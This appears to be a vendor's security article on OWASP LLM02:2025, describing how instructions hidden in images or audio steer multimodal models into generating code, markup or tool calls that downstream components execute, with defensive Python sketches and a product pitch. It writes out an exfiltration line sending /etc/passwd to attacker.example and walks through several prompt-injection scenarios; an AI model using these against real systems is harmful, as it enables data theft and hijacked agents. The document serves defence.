OWASP LLM02:2025 Insecure Output Handling — the multimodal-origin attack chain

The standard OWASP LLM02:2025 (Insecure Output Handling) playbook begins with a user typing a malicious prompt. In a multimodal application, the prompt never has to be typed: an instruction hidden in an uploaded image or audio file reaches the vision or audio model, the model's output becomes the attack payload, and that payload flows into a downstream code interpreter, web renderer, or database without the output sanitizer ever seeing the root cause. This is the LLM01→LLM02 chain. An output-only control catches some harm at the end of the chain, but it cannot break the chain at the start. Here is what LLM02:2025 names, where multimodal inputs create LLM02 exposure that a text-only program misses, and the two-control architecture — input inspection and output sanitization — that closes both risks together.

TL;DR

LLM02:2025 (canonical risk page at the OWASP GenAI Security Project) covers the class of vulnerabilities where LLM-generated output is consumed by a downstream component — a code interpreter, a web renderer, an API, a shell — without sanitization or validation. In multimodal apps, the payload that reaches the downstream component can originate in an image or audio file rather than a typed prompt. A text-only output sanitizer sees the same poisoned code or markup either way; it does not know the taint came from pixels. Breaking the chain before the poisoned output is generated — by scanning the image or audio bytes before they reach the model — is the structural answer. Glyphward is the inference-time multimodal scanner that sits at that boundary and blocks the tainted input so no poisoned output is ever produced for a downstream component to execute.

What LLM02:2025 actually covers

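LLM02:2025 takes its name from the class of downstream-execution vulnerabilities that exist when an application passes LLM output to another system without treating that output as untrusted. The 2025 revision of the OWASP Top 10 for LLM Applications identifies several categories of downstream harm: remote code execution through a code interpreter or shell, cross-site scripting (XSS) through rendered markdown or HTML, server-side request forgery (SSRF) through URL fetching, and privilege escalation through structured output written to an API or database.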

The 2025 list names these scenarios because code-interpreter agents, agentic pipelines that render LLM output in web views, and structured-output-to-API patterns are now mainstream in production AI applications. The control the list calls for is sanitization and validation of every LLM output before it reaches a downstream executor — not trust that the model's output is safe because the model's input was user-supplied text.

Where multimodal inputs create LLM02 exposure

The standard LLM02 framing assumes the attack begins at the text input boundary: a user or an external source crafts a prompt that steers the model into producing harmful output. In multimodal applications, that assumption is wrong. The attack can begin at the image or audio boundary instead.

The chain works in two stages. Stage one is LLM01 multimodal: an instruction is hidden inside image pixels or an audio waveform, for example a FigStep-style adversarial-glyph overlay, an AgentTypo confusable-character block, a WhisperInject ultrasonic carrier, or an indirect injection carried by an image in a retrieved document (see FigStep detection, AgentTypo detector, WhisperInject detection, indirect prompt injection in images). The vision or audio model reads those bytes as part of the context and follows the embedded instruction. Stage two is LLM02: the model's output, now shaped by the injected instruction, flows to a downstream component that executes it. That component is not the model itself; it is the code interpreter, the markdown renderer, the structured-output parser, or the API adapter that consumes the model's output.

What makes this chain dangerous for a standard LLM02 control program is that the output sanitizer observes the same output regardless of whether the taint came from a typed user prompt or from pixels in an uploaded image. The output sanitizer cannot close the chain at its root. It can catch some terminal harm — rejecting a generated rm -rf command before the shell runs it, stripping a <script> tag before the browser renders it — but it cannot prevent the model from having generated the payload in the first place. The only structural closure is at stage one: scan the image or audio bytes before they reach the model, so no poisoned output is ever produced for the downstream component to process.
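The ordering of the two stages can be sketched as a small pipeline function. This is a minimal illustration, not a reference implementation: `scan_input`, `call_model`, `sanitize_output`, and `execute` are hypothetical callables supplied by the application, and the convention that the scanner returns `True` for "reject" is an assumption made for the example.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class PipelineResult:
    stage: str             # where the request stopped: "input", "output", or "executed"
    output: Optional[str]  # sanitized model output, if any reached the executor


def run_pipeline(
    attachment: bytes,
    scan_input: Callable[[bytes], bool],              # hypothetical: True means "reject"
    call_model: Callable[[bytes], str],               # hypothetical model wrapper
    sanitize_output: Callable[[str], Optional[str]],  # hypothetical: None means "reject"
    execute: Callable[[str], None],                   # the downstream component
) -> PipelineResult:
    # Stage one: inspect the raw bytes before the model sees them.
    if scan_input(attachment):
        return PipelineResult(stage="input", output=None)

    # The model only runs on attachments that passed stage one.
    raw = call_model(attachment)

    # Stage two: treat the model's output as untrusted.
    safe = sanitize_output(raw)
    if safe is None:
        return PipelineResult(stage="output", output=None)

    execute(safe)
    return PipelineResult(stage="executed", output=safe)
```

When stage one rejects an attachment, `call_model` is never invoked, which is the sense in which the chain is closed at its root rather than at its end.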

Four multimodal-origin LLM02 attack scenarios

Four attack patterns recur in the multimodal LLM02 threat model across production application categories.

1. Code-interpreter agent with image input. The application lets users upload screenshots or charts for analysis; the model reads the image and then generates Python that the code interpreter runs. A FigStep-style overlay on the uploaded image instructs the model to include a data-exfiltration line in its generated code: import urllib.request; urllib.request.urlopen('https://attacker.example/?' + open('/etc/passwd').read()). The user's visible output is a normal-looking analysis; the exfiltration runs silently in the REPL. An output sanitizer that validates generated Python can catch this specific form if it pattern-matches the exfiltration URL or the system-file path. But the model can express an equivalent payload in many syntactic variations, which turns signature-based output filtering into an arms race. Closing stage one, by rejecting the FigStep-bearing image before it reaches the model, prevents the tainted Python from being generated at all. Per-product threat model in screenshot-reading agents, CrewAI agents, and AutoGen agents.
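One way to make stage-two validation of generated Python less dependent on signatures is to parse the code and apply an allowlist to what it imports and calls. The sketch below uses the standard-library `ast` module. The `ALLOWED_IMPORTS` and `BLOCKED_CALLS` sets are assumptions chosen for illustration, and a static check like this can be bypassed (for example through attribute lookups), so it complements a sandbox rather than replacing one.

```python
import ast

# Assumption: an analysis task needs only these modules. Adjust per application.
ALLOWED_IMPORTS = {"math", "statistics", "json"}
# Built-ins that open files or evaluate code; illustrative, not exhaustive.
BLOCKED_CALLS = {"open", "exec", "eval", "compile", "__import__"}


def violations(source: str) -> list[str]:
    """Return reasons to reject generated code; an empty list means no finding."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]

    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] not in ALLOWED_IMPORTS:
                    found.append(f"import of {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] not in ALLOWED_IMPORTS:
                found.append(f"import from {node.module}")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                found.append(f"call to {node.func.id}()")
    return found
```

Run against the exfiltration line from the scenario, the check reports both the `urllib.request` import and the `open()` call without needing to know the attacker's URL or the file path.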

2. Multimodal chatbot with markdown rendering. The application renders LLM output as HTML in a chat interface. Users can upload images in conversation. An adversarial image instructs the model to output a markdown link that, when rendered, loads an attacker-controlled resource or triggers a JavaScript handler. The result is classic stored-XSS impact (session token theft, CSRF, UI redirection) delivered through the vision channel. An output sanitizer that strips <script> tags and enforces a Content Security Policy (CSP) catches the terminal step for most delivery forms. But a sandboxed rendering environment plus output sanitization is a significantly more complex control to maintain than scanning the image at upload time. Per-product threat model in chatbots with image upload.
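The output-side step for this scenario can be sketched as a function that escapes raw HTML and keeps only links whose targets are on an allowlist. This is a simplified illustration: `ALLOWED_HOSTS` is a hypothetical allowlist, the regular expression handles only inline markdown links and images, and a production renderer would normally rely on a maintained sanitizer library together with a CSP.

```python
import html
import re
from urllib.parse import urlsplit

# Assumption: only these hosts may appear in rendered links or images.
ALLOWED_HOSTS = {"docs.example.com"}

# Matches inline markdown links and images: [label](url) and ![alt](url).
LINK = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)\)")


def sanitize_markdown(text: str) -> str:
    """Escape raw HTML and drop links or images outside the allowlist."""
    escaped = html.escape(text, quote=False)

    def check(match: re.Match) -> str:
        label, url = match.group(2), html.unescape(match.group(3))
        try:
            parts = urlsplit(url)
        except ValueError:
            return label  # malformed URL: keep the text, drop the target
        if parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS:
            return match.group(0)
        return label  # keep the visible text, drop the target

    return LINK.sub(check, escaped)
```

The allowlist approach means an attacker-controlled image URL or a `javascript:` target is dropped because it is not on the list, not because it matched a known-bad pattern.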

3. RAG pipeline with image-bearing PDFs. A document retrieval pipeline ingests PDFs and passes retrieved chunks to the model. A PDF with an embedded image carries a FigStep or indirect-injection payload: an instruction to include a specific URL in the model's synthesized answer, or to populate a structured-output field with an attacker-specified value. If the model's answer feeds a downstream API call or a database write, the injected field value executes with the application's permissions. An output sanitizer on the API call can validate schema conformance, but a schema is often wide enough to admit a privilege-escalating value (a role override, a quota increase, an admin flag). Stage-one closure, meaning scanning images extracted from PDFs at ingestion or retrieval time, prevents the poisoned chunk from ever reaching the model. Per-product threat model in RAG pipelines.
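A tight schema for the structured-output case rejects unknown fields outright and constrains every known field to an explicit set or range. The sketch below uses plain Python rather than a schema library; the `SCHEMA` fields describe a hypothetical support-ticket write and are not taken from any real API.

```python
# Hypothetical schema for a support-ticket write; field names are illustrative.
SCHEMA = {
    "ticket_id": lambda v: isinstance(v, str) and v.isalnum() and len(v) <= 32,
    "summary": lambda v: isinstance(v, str) and len(v) <= 500,
    "priority": lambda v: isinstance(v, str) and v in {"low", "normal", "high"},
}


def validate_payload(payload: dict) -> list[str]:
    """Reject unknown fields, missing fields, and out-of-range values."""
    errors = []
    # Unknown keys are errors, so a smuggled "role" or "is_admin" field fails closed.
    for key in sorted(payload.keys() - SCHEMA.keys()):
        errors.append(f"unexpected field: {key}")
    for key, check in SCHEMA.items():
        if key not in payload:
            errors.append(f"missing field: {key}")
        elif not check(payload[key]):
            errors.append(f"invalid value for {key}")
    return errors
```

The design choice is to enumerate what is allowed rather than what is forbidden: a role override or admin flag is rejected because the schema never mentions it.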

4. Voice agent with code generation or tool dispatch. The application transcribes audio, passes the transcript to an LLM, and uses the model's response to dispatch tool calls or generate configuration. A WhisperInject-class payload in the audio instructs the model to add a tool call not requested by the user — a calendar write to an attacker-controlled time slot, an API call to an exfiltration endpoint, a configuration change that persists across sessions. The transcript that reaches the text-side guard is clean (Whisper dropped the carrier); the model's output contains the injected tool call. Per-product threat model in voice agents; byte-level coverage in audio prompt-injection detection.
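On the output side, an injected tool call can be held back by comparing what the model proposes against the tools the application has enabled for the current turn. The sketch below assumes the application derives `allowed_for_turn` from its own state (for example the feature the user invoked) and not from model output; `ToolCall` and the tool names are hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class ToolCall:
    name: str
    args: dict = field(default_factory=dict)


def gate_tool_calls(proposed, allowed_for_turn):
    """Split model-proposed tool calls into dispatchable and held-back lists."""
    dispatch, held = [], []
    for call in proposed:
        if call.name in allowed_for_turn:
            dispatch.append(call)
        else:
            held.append(call)  # log, and require confirmation or drop
    return dispatch, held
```

A calendar write that appears during a turn where only a weather lookup was enabled lands in `held`, which gives the output sanitizer a concrete rejection to log.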

Why text output filters do not close the multimodal-origin chain

Three architectural facts explain why output sanitization is necessary but not sufficient for multimodal-origin LLM02.

Position in the pipeline. An output sanitizer sits after the model. It processes the model's response before a downstream component executes it. That position is correct and useful: it is the last line of defence before real harm occurs. But it cannot see why the model produced that particular output. An rm -rf command in generated code looks identical whether the model was steered there by a typed jailbreak, a FigStep overlay in an uploaded image, or an indirect injection in a retrieved PDF. The sanitizer treats all three the same. It catches the terminal form of the attack but cannot prevent the model from generating the next syntactic variant.
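The "next syntactic variant" problem is easy to see with a toy signature filter. The pattern and the command strings below are invented for illustration; the point is only that a filter written for one surface form says nothing about equivalent forms.

```python
import re

# A signature written for the most familiar spelling of the command.
SIGNATURE = re.compile(r"rm\s+-rf\b")


def signature_blocks(command: str) -> bool:
    """Return True if the signature filter would reject this command."""
    return bool(SIGNATURE.search(command))


# Commands with the same destructive effect, spelled differently.
VARIANTS = [
    "rm -rf /data",
    "rm -r -f /data",
    "rm --recursive --force /data",
    "find /data -delete",
]

for cmd in VARIANTS:
    print(f"{cmd!r}: blocked={signature_blocks(cmd)}")
```

Only the first spelling is blocked. Each missed variant can be patched with a new signature, but the model that was steered by the injected instruction can keep producing new ones.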

The OCR adapter problem. One mitigation for image inputs is to run OCR on every uploaded image and pass the OCR output through the text-side output sanitizer as if it were a text input. This does not close the multimodal-origin LLM02 chain for the same reason it does not close LLM01 multimodal: FigStep, AgentTypo, and the adversarial-glyph class are specifically designed to survive OCR. The pixels contain an instruction the vision model reads; the OCR transcript does not contain that instruction; the text-side filter sees nothing suspicious. See why every text-only scanner misses a 30-pixel PNG for the full architectural argument. The same structural ceiling applies when the OCR adapter is feeding an output filter rather than an input filter.

Indirect vectors skip text inspection entirely. In a RAG pipeline or an MCP-connected agent, the image or audio bytes arrive through a retrieval, a tool result, or an embedded resource — not through a direct user upload. The user's initial message may be benign and entirely clean on both text-side input and output filters. The taint enters through the non-text channel (see MCP servers and RAG pipelines). Neither the text-side input filter nor the text-side output filter has a chance to observe the payload before it reaches the model.

Coverage matrix — LLM02 multimodal evidence

For a buyer building an LLM02:2025 control program that accounts for multimodal-origin attack paths, the question is which tools address each layer. The table below separates input-side multimodal coverage (stage one — prevents poisoned output from being generated) from output-side sanitization (stage two — catches terminal harm before downstream execution).

| Tool | Input-side multimodal scan | Output-side text sanitization | LLM02 multimodal-origin coverage |
| --- | --- | --- | --- |
| Lakera Guard | No (text-only input guard) | Yes (output scanner available) | Stage 2 only; multimodal-origin chain not broken at root |
| LLM Guard (OSS) | No (text-only by design) | Yes (output scanners in OSS library) | Stage 2 only; multimodal-origin chain not broken at root |
| Azure Prompt Shields | Image moderation, not PI | Yes (Azure Content Safety output filters) | Stage 2 only; image moderation ≠ PI detection on input |
| Promptfoo | Eval-time test harness | Eval-time test harness | Neither stage at inference time; CI/eval tool, not runtime control |
| Glyphward | Yes (image + audio bytes, inference-time) | Not in scope (pair with text-side output filter) | Stage 1; breaks the chain before poisoned output is generated |

The operative takeaway is that Glyphward and a text-side output sanitizer are complements, not substitutes. LLM02 needs both: the multimodal input scanner closes the root-cause path, and the output sanitizer catches any residual harm that reaches the downstream boundary — whether from text-side injection or from a multimodal-origin payload that evaded the input scanner (e.g., a novel attack class not yet in the corpus). No single tool closes both stages unilaterally. The comparison detail is in Glyphward vs Lakera Guard, vs LLM Guard, vs Azure Prompt Shields, and vs Promptfoo.

The two-control architecture for LLM01+LLM02 compliance

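Closing LLM02:2025 in a multimodal application requires two controls positioned at two different pipeline boundaries. Neither replaces the other; they address different stages of the same attack chain. Items 1 and 2 below are the two controls; items 3 to 5 are supporting practices that make those controls tunable, auditable, and testable.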

  1. Stage-one: multimodal input inspection. Place the scanner on every boundary at which image or audio bytes enter the model's context — the upload handler before the vision API call, the audio buffer before the STT pipeline, the loader middleware before RAG ingestion, the tool-result handler before MCP content blocks reach the LLM host. Score each byte payload against the PI detection corpus. Reject or quarantine payloads above the threshold before they reach the model. This prevents any poisoned output from being generated; there is nothing for a downstream executor to receive. Per-framework mount points in LangChain, CrewAI, AutoGen, OpenAI Assistants API, RAG pipelines, and MCP servers.
  2. Stage-two: output sanitization before downstream execution. Validate and sanitize every LLM output before passing it to a code interpreter, a web renderer, an API client, or a data store. This is the standard LLM02 control: treat the model's response as untrusted user input at every downstream boundary. For code execution, run the generated code through a static analyser or execute in a sandboxed environment with no network or filesystem access. For web rendering, enforce a strict CSP and strip all raw HTML from markdown output. For structured-output-to-API flows, validate the output against a tight schema that rejects unexpected fields and values. For database writes, use parameterised queries regardless of the LLM output's apparent structure.
  3. Source-aware trust thresholds. Apply lower scan thresholds for content that arrives from less-trusted sources — third-party tool results, public-web retrievals, community-contributed documents. The same image byte stream from a first-party internal document warrants a different risk posture than the same bytes arriving from an untrusted URL in an MCP server's tool response. Source-aware thresholds let the control program express this risk tier without blocking first-party content unnecessarily.
  4. Per-request scoring for evidence. Both controls should produce per-request evidence: the multimodal scanner returns a request ID and a 0–100 score; the output sanitizer logs every rejection and the downstream component it protected. LLM02:2025 audit evidence is a claim about pipeline integrity across all execution paths — not just the happy path — and per-request logs are the only way to demonstrate coverage at scale. The OWASP LLM01 and LLM02 evidence questions are typically asked together in an audit; the combined log answers both from a single evidence trail.
  5. Ongoing testing. Add multimodal PI payloads to your CI eval suite (see Promptfoo + multimodal scanning). A red-team run against each modality the application accepts (direct image upload, audio input, and every indirect channel) verifies that the stage-one scanner is catching the current corpus and that the stage-two sanitizer is rejecting the tainted outputs the model produces when the scanner is disabled. Toggling each stage on and off gives four test configurations (neither stage, stage one only, stage two only, both); the failure modes of each combination map directly onto the OWASP LLM02 evidence question structure.
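Source-aware thresholds and per-request evidence can be combined in one small decision function. In this sketch the tier names and threshold values are assumptions, the score is taken to be on the scanner's 0 to 100 scale with payloads above the threshold rejected, and `request_id` stands in for whatever identifier the scanner returns.

```python
import json
import time

# Assumed trust tiers and thresholds on a 0-100 scale; a lower threshold is stricter.
THRESHOLDS = {"first_party": 80, "user_upload": 60, "third_party": 40}


def decide(request_id: str, score: int, source: str) -> dict:
    """Apply the per-source threshold and return a loggable evidence record."""
    # An unrecognized source falls back to the strictest threshold.
    threshold = THRESHOLDS.get(source, min(THRESHOLDS.values()))
    return {
        "request_id": request_id,
        "timestamp": time.time(),
        "source": source,
        "score": score,
        "threshold": threshold,
        "action": "reject" if score > threshold else "allow",
    }


# The same score is rejected from a third-party tool result and allowed first-party.
print(json.dumps(decide("req-1", 55, "third_party")))
print(json.dumps(decide("req-2", 55, "first_party")))
```

Writing one record per request, including the allowed ones, is what lets the log demonstrate coverage across all paths rather than only the rejections.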

How Glyphward closes stage one

Glyphward is the inference-time multimodal scanner — bytes in, 0–100 score and flagged region out — that sits at the stage-one boundary described above. The HTTP contract is one POST per attachment: image bytes or URL, or audio bytes; the response is a score, the flagged region (bounding box for images, time window for audio), the modality-tagged reason, and a request ID. The scanner runs CLIP embedding plus a typographic-PI detection head plus Tesseract OCR cross-referenced against a curated payload corpus on the image side, and a waveform anomaly classifier plus Whisper-small transcript filter on the audio side. Full architecture in the multimodal prompt-injection threat model for AI product teams (2026).
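The shape of that contract (one POST per attachment in; score, flagged region, reason, and request ID out) can be sketched with the standard library. Everything concrete below is an assumption made for illustration: the endpoint URL, the header names, and the JSON field names are hypothetical and are not taken from the product's API documentation.

```python
import json
import urllib.request
from dataclasses import dataclass
from typing import Optional

# Hypothetical endpoint; the text above describes the contract's shape only.
SCAN_URL = "https://scanner.example/v1/scan"


@dataclass
class ScanResult:
    request_id: str
    score: int               # 0-100
    reason: str              # modality-tagged reason
    region: Optional[dict]   # bounding box (image) or time window (audio)


def build_request(payload: bytes, content_type: str, api_key: str) -> urllib.request.Request:
    """Build one POST per attachment, carrying the raw bytes (not sent here)."""
    return urllib.request.Request(
        SCAN_URL,
        data=payload,
        method="POST",
        headers={"Content-Type": content_type, "Authorization": f"Bearer {api_key}"},
    )


def parse_response(body: bytes) -> ScanResult:
    """Parse a response body using assumed field names and check the score range."""
    doc = json.loads(body)
    score = int(doc["score"])
    if not 0 <= score <= 100:
        raise ValueError(f"score out of range: {score}")
    return ScanResult(doc["request_id"], score, doc.get("reason", ""), doc.get("region"))
```

Keeping request construction and response parsing as separate pure functions makes the integration testable in CI without network access.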

For an LLM02:2025 audit the scanner addresses the multimodal-origin gap: the stage-one scores, request IDs, and flagged-region reasons constitute the evidence that multimodal inputs are inspected before they reach any model that produces downstream-executed output. That evidence answers the implicit question behind every LLM02 audit item — "what controls prevent the model from generating a harmful payload from a non-text input?" — in the same way the text-side input guard answers the same question for text inputs.

Glyphward does not replace an output sanitizer — it pairs with one. The OWASP LLM01:2025 multimodal coverage page covers the input-side control in detail. The output-side control belongs to the same text-PI vendor family (Lakera, LLM Guard, Azure) most teams already use for text inputs; Glyphward is the missing half, not a replacement for the half that already exists. Pricing is flat-rate self-serve at $29/mo Pro and $99/mo Team, with a free tier for prototyping via the free-tier API.

Related questions

Does LLM02:2025 explicitly name multimodal inputs as an attack vector?

The 2025 description of LLM02 focuses on downstream execution paths (code interpreters, web renderers, SQL interpreters) and the failure to sanitize LLM output before those paths execute it. The upstream attack vector — whether a user typed a prompt, uploaded an image, or supplied an audio file — is not the primary focus of the LLM02 description. That is LLM01's territory. The reason multimodal inputs appear in an LLM02 program is that LLM01 and LLM02 are two stages of the same attack chain: a multimodal LLM01 injection produces a tainted LLM output, and that tainted output is the LLM02 payload. An audit that covers both controls will ask about the multimodal-origin path through both. Covering LLM01 multimodal effectively is therefore part of a complete LLM02 program even though LLM02's own description does not name images or audio.

Can I close LLM02 just with sandboxed code execution, without a multimodal input scanner?

Sandboxing reduces the blast radius of RCE — code that executes with no network or filesystem access cannot exfiltrate secrets even if it runs. That is a valid control for the code-execution sub-category of LLM02. But it does not address XSS (rendered markdown), SSRF (URL fetching), or structured-output injection (privilege escalation through API/DB writes), which are also LLM02:2025 categories. And for all categories, sandboxing treats the symptom rather than the cause: the model still generated the injected payload, and the sandbox is a bet that every future generated payload remains within sandbox limits. Adding a multimodal input scanner at stage one is complementary: it prevents the injection before the model generates any payload, so there is nothing for the sandbox to contain.

What is the relationship between LLM02 and LLM06 (Excessive Agency)?

LLM06:2025 (Excessive Agency) covers the scenario where an LLM application has been granted more permissions, capabilities, or autonomy than the task requires, and an attacker exploits that over-provisioning to cause harm. The multimodal LLM02 chain and the LLM06 risk intersect at the code-interpreter-agent scenario: if the code executor has write access to production files or network access to internal APIs, an LLM02 injection (malicious code generated from a tainted image) causes LLM06-class harm (excessive agency enabling real damage). Closing LLM02 multimodal at stage one reduces but does not replace the need for LLM06 controls (least-privilege tool permissions, confirmation gates for irreversible actions). The two controls are independent layers, not alternatives.

How do I evidence LLM02 multimodal coverage in a SOC 2 or ISO 27001 audit?

The evidence structure is the same as for LLM01 multimodal: per-request scan IDs and scores from the input scanner plus per-request rejection logs from the output sanitizer. For an auditor asking about LLM02 in a multimodal application, the operative question is whether each downstream execution path (code, render, API, database) has a documented sanitization control, and whether the input path that feeds the model has a documented inspection control. Answer both with log samples: a scan ID from the multimodal scanner showing a flagged image was rejected before model inference, and a rejection log from the output sanitizer showing a generated code block was blocked before the REPL ran it. The two logs together cover the full chain. Glyphward's Pro and Team tiers include logging and per-request IDs suitable for this evidence trail without additional engineering.

Where does LLM02 sit relative to the other OWASP LLM compliance pages on this site?

The LLM01:2025 multimodal page covers the input-inspection control — the stage-one half of the chain described on this page. LLM01 is the upstream risk; LLM02 is the downstream risk. The EU AI Act Article 15 and NIST AI RMF GenAI Profile compliance pages (EU AI Act, NIST AI RMF, MITRE ATLAS, NIST AI 100-2) cover the same multimodal input inspection control mapped onto different vocabulary sets. An LLM02 multimodal evidence trail that references the stage-one Glyphward control can cite both the LLM01:2025 multimodal sub-category and any applicable standard vocabulary — they describe the same scanner from different audit angles.

Further reading